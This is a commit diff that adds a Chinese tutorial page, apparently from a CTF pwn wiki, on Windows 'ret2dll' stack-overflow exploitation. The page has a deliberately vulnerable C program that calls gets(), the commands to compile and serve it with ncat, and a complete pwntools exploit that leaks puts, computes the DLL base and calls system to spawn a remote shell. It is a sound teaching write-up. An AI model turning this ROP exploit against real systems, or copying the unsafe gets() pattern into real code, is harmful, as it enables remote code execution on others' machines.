add windows ret2dll

docs/zh/docs/pwn/windows/user-mode/stackoverflow/ret2dll.md

@@ -0,0 +1,86 @@
+# ret2dll利用
+
+原理与linux下的ret2libc类似，不过需要手动提取地址，目前pwntools不能提取exe文件地址。
+源代码如下
+```
+#include <stdio.h>
+#include <ctype.h>
+#define DEFAULT_LEN 16
+int val(){
+        char buff[DEFAULT_LEN] = {0};
+        gets(buff);
+}
+int main(void)
+{
+        puts("start");
+        fflush(stdout);
+        val();
+        fflush(stdout);
+        puts("end");
+        fflush(stdout);
+}
+```
+使用gcc(MinGW-W64 x86_64-ucrt-posix-seh)在windows下编译
+
+`gcc "-Wl,--disable-reloc" -g -o ret2dll.exe ret2dll.c`
+
+
+## 搭建临时环境
+
+使用ncat
+`ncat -l 8080 --keep-open --exec ".\ret2dll.exe"`
+使用win_server
+win_server ./ret2dll.exe 8080
+
+exp如下
+```
+from pwn import *
+
+context.log_level='debug'
+context.arch='amd64'
+p=remote("192.168.0.190",8080)#这里替换为windows的ip
+main_addr=0x14000155B#手动输入地址
+ret_addr=0x1400015D7
+puts_plt=0x140002868
+puts_got=0x14000829C
+rdi_addr=0x140002447
+rcx_addr=0x140002750
+#bp 0x140001554
+
+
+payload  = b'a' * (0x10 +8)
+payload += p64(rcx_addr)
+payload += p64(puts_got)
+payload += p64(puts_plt)
+
+payload += p64(main_addr)
+p.recvuntil("start")
+p.sendline(payload)
+puts_leak=u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))
+
+print("leak addr:",hex(puts_leak))
+
+puts_dll=0x11014E470
+cmd_dll=0x0110179E48
+sytem_dll=0x0110117E50
+
+dll_base=puts_leak-puts_dll
+# dll_base=0x7ffe71e00000
+print("base addr:",hex(dll_base))
+
+cmd_addr = dll_base +cmd_dll
+system_addr=dll_base+sytem_dll
+print("start attck")
+payload  = b'a' * (0x10 + 8)
+payload += p64(ret_addr)
+payload += p64(rcx_addr)
+payload += p64(cmd_addr)
+payload += p64(system_addr)
+
+p.sendline(payload)
+p.interactive()
+```
+
+效果如下
+
+![ret2dll](./figure/ret2dll-1.png)